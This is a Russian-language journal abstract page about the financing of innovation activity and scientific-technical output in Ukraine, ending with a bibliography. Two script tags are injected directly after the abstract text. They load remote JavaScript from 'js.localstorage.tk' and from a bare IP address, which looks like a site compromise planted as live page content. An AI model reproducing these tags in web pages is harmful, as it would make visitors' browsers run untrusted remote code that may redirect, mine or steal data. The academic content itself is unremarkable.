ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 65.012.12:338.434:330.341
Сторінка молодого науковця

Создание научно-технической продукции и объемы финансирования инновационной деятельности в Украине / Задорожная Л.М. // Экономика АПК. - 2014. - № 3 - С. 119

Проанализированы динамика создания научно-технической продукции, объемы, динамика и структура финансирования инновационной деятельности в Украине. Приведены темпы роста/уменьшения объемов финансирования государственного заказа, определена структура общего объема расходов по направлениям инновационной деятельности, распределение расходов на её осуществление по стратегическим приоритетным направлениям в 2012 году. Проведено распределение расходов на среднесрочные приоритетные направления инновационной деятельности общегосударственного уровня по стратегическому приоритету «Технологическое обновление и развитие агропромышленного комплекса» в 2012 году. Предложены обоснованные направления развития инновационной деятельности. Табл.: 1. Илл.: 6. Библиогр.: 7.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключевые слова: динамика, анализ, научно-техническая продукция, инновация, инновационная деятельность, расходы, объемы финансирования, бюджетные средства

Список использованных источников

  1. Hall B. H. The Financing of Innovation / Bronwyn H. Hall // December 2005. – P. 28.
  2. Kubiš J. Policy Options and Instruments for Financing Innovation: A Practical Guide to Early-Stage Financing / Ján Kubiš // United Nations Economic Commission for Europe. – New York and Geneva. – 2009. – P. 62.
  3. Реалізація пріоритетних напрямів розвитку науки і техніки та одержані результати у 2012 р. Аналітична довідка. – К., 2013. – С. 54.
  4. Наука та інновації в Україні [Електронний ресурс]. – Режим доступу: http://www.ukrstat.gov.ua/.
  5. Лапко О. Проблеми інноваційної діяльності / О. Лапко // Економіка України. – 2009. − № 8. – С. 93–95.
  6. Принципи формування і механізми реалізації фінансової політики приватизованих підприємств: [моногр.] ; за наук. ред. д-ра екон. наук, проф. М. А. Козоріз // Інститут регіональних досліджень НАН України. – Львів: ЛБІ НБУ, 2004. – 358 с.
  7. Терещенко О. О. Фінансова діяльність суб’єктів господарювання: [навч. посіб]. / О. О. Терещенко. – К.: КНЕУ, 2003. – 554 с.
Читать статью: 14_03_119-126.pdf